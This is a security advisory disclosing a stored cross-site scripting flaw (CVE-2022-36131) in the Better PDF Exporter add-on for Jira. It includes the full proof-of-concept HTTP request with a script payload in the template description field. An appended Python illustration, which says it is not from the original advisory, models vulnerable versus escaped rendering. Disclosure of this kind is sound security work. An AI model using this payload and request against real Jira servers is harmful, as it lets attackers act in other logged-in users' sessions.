-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2022-038
Product: Better PDF Exporter for Jira
Manufacturer: Midori Global Consulting Kft.
Affected Version(s): 10.0.0
Tested Version(s): 9.6.0
Vulnerability Type: Stored Cross-Site Scripting (CWE-79)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2022-05-27
Solution Date: -
Public Disclosure: 2022-07-22
CVE Reference: CVE-2022-36131
Author of Advisory: Lukas Faiß, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Better PDF Exporter is an add-on for Jira to export Jira artifacts to
PDF files.
The manufacturer describes the product as follows (see [1]):
"Better PDF Exporter exports Jira issues to PDF documents to share,
print, email, archive and report issues in the standard business
document file format."
Due to insufficient input validation of user-provided input, Better PDF
Exporter is vulnerable to cross-site scripting attacks.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The 'PDF Templates' overview is prone to a stored cross-site scripting
attack. XSS vulnerabilities allow an attacker to embed malicious
JavaScript code into server replies which is later executed in the
web browsers of other users. By executing JavaScript, attackers can, for
example, perform actions in the context of other logged-in users.
For testing purposes, the add-on of the manufacturer[1] was used in
a local Jira Server[4] installation.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The 'PDF Template' view in the administration back end serves as the
injection point for the attack.
After entering the attack vector "<script>alert('SySS_PXSS_PoC');</script>"
(the URL-decoded form of the 'description' parameter shown below) in the
description field of a PDF template, the following request is sent to the
server:
POST /rest/com.midori.jira.plugin.pdfview/1.0/pdf-resource/30 HTTP/2
Host: [REDACTED]
Cookie:
Content-Length: 153
Sec-Ch-Ua: "Not A;Brand";v="99", "Google Chrome";v="101"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent:
Sec-Ch-Ua-Platform: "Linux"
Origin: [REDACTED]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [REDACTED]/secure/update-pdf-resource.jspa?id=30
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
name=Pentest.pdf&description=%3cscript%3ealert('SySS_PXSS_PoC')%3b%3c
%2fscript%3e&content=content
By calling the 'PDF Template' overview page through the URL
"https://[REDACTED]/secure/pdf-resources.jspa", the payload is loaded
and executed. The payload is listed in the following response:
...
Pentest.pdf
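The following Python snippet is an added illustration written for this
advisory, not code from Better PDF Exporter or from SySS. It models the
data flow described in the PoC: the form body of the POST request above is
decoded as the endpoint would decode it, the stored 'description' value is
then rendered into an overview page once without output encoding
(assumed to be what the affected version does) and once with HTML
entity encoding (the fix an add-on developer would apply in the template
that renders the 'PDF Templates' overview). The table layout and function
names are assumptions for the model only; the request body is the one from
the advisory, joined across its line wrap.

```python
import html
from urllib.parse import parse_qs

# Request body from the PoC above (the advisory wraps it over two lines).
POC_BODY = (
    "name=Pentest.pdf&description=%3cscript%3ealert('SySS_PXSS_PoC')%3b"
    "%3c%2fscript%3e&content=content"
)

# The URL-decoded attack vector, as it is stored server-side.
PAYLOAD = "<script>alert('SySS_PXSS_PoC');</script>"


def parse_pdf_resource_update(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict.

    parse_qs returns a list per key; a form with single-valued fields is
    flattened to the first value, mirroring what a servlet's getParameter()
    would hand to the add-on.
    """
    fields = parse_qs(body, keep_blank_values=True)
    return {key: values[0] for key, values in fields.items()}


def render_overview_vulnerable(templates: list[dict]) -> str:
    """Assumed vulnerable rendering: stored fields are dropped into the
    markup verbatim, so a description containing a script element becomes
    part of the page's DOM and executes in every administrator's browser."""
    rows = "".join(
        f"<tr><td>{t['name']}</td><td>{t['description']}</td></tr>"
        for t in templates
    )
    return f"<table>{rows}</table>"


def render_overview_fixed(templates: list[dict]) -> str:
    """Hardened rendering: every stored field is HTML-entity encoded at the
    point where it is written into an HTML text context. html.escape()
    also encodes quotes, so the same helper is safe for attribute values."""
    rows = "".join(
        f"<tr><td>{html.escape(t['name'])}</td>"
        f"<td>{html.escape(t['description'])}</td></tr>"
        for t in templates
    )
    return f"<table>{rows}</table>"


def payload_is_live(page: str, payload: str = PAYLOAD) -> bool:
    """Verification check for the pdf-resources.jspa response: the finding
    is still present when the payload appears byte-for-byte in the page,
    i.e. the browser will parse it as markup rather than as text."""
    return payload in page


if __name__ == "__main__":
    stored = parse_pdf_resource_update(POC_BODY)
    print("stored description:", stored["description"])
    print("vulnerable page executes payload:",
          payload_is_live(render_overview_vulnerable([stored])))
    print("fixed page executes payload:     ",
          payload_is_live(render_overview_fixed([stored])))
```

The check in payload_is_live() is what a tester re-runs after the vendor
ships a fix: fetching /secure/pdf-resources.jspa and finding the literal
payload means the overview still writes the description unencoded; finding
only the entity-encoded form means the sink is closed for this context.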